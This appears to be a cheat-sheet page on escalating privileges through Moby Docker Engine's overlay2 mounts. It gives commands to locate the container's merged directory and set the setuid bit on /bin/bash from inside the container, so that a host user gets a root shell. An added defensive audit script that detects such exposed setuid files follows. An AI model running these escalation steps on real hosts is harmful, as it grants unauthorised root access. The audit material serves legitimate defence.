Moby Docker Engine PrivEsc
Last modified: 2023-05-02
First, find the host directory where the Docker container's filesystem is mounted.
findmnt # Results e.g. /var/lib/docker/overlay2/abcdef...xyz/merged
Assuming the directory above was found, we can inspect its contents.
ls -la /var/lib/docker/overlay2/abcdef...xyz/merged/
If we are root inside the Docker container, set the setuid bit on an arbitrary binary as below. Note that this must be done inside the container, not on the real host.
chmod u+s /bin/bash
Back on the real host machine, execute the binary on which we set the setuid bit to escalate privileges.
We should get a root shell.
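From the defender's side, the steps above only work when an unprivileged host user can traverse into the container's merged directory. The audit script below is an added example, not part of the original page: it assumes it is run as root on the Docker host, and its function names and the --scan argument are this example's own.

```shell
#!/bin/sh
# Added audit example, not from the original page. Function names and the
# --scan argument are this example's own. Run as root on the Docker host.

# Return 0 if every directory from $1 up to $2 (default /) has the "other"
# execute bit set, i.e. an unprivileged host user can traverse into $1.
world_traversable() {
    w_dir=$1
    w_top=${2:-/}
    while :; do
        [ -n "$(find "$w_dir" -maxdepth 0 -perm -0001 2>/dev/null)" ] || return 1
        if [ "$w_dir" = "$w_top" ] || [ "$w_dir" = "/" ]; then
            return 0
        fi
        w_dir=$(dirname "$w_dir")
    done
}

# Print regular files below $1 that carry the setuid bit.
setuid_files() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# Read mount targets on stdin; print "EXPOSED <file>" for each setuid file
# in a mount that non-root host users can reach. Returns 1 on any finding.
audit_mounts() {
    a_rc=0
    while IFS= read -r a_mnt; do
        world_traversable "$a_mnt" "${1:-/}" || continue
        a_hits=$(setuid_files "$a_mnt") || :
        if [ -n "$a_hits" ]; then
            printf '%s\n' "$a_hits" | sed 's/^/EXPOSED /'
            a_rc=1
        fi
    done
    return "$a_rc"
}

# Scan the live overlay mounts, as listed by findmnt on the host.
if [ "${1:-}" = "--scan" ]; then
    findmnt -rn -t overlay -o TARGET | audit_mounts
    exit
fi
```

Any EXPOSED line means a setuid file inside a container filesystem is reachable by ordinary host users; removing the "other" execute bit on a parent directory of the merged path makes the audit come back clean.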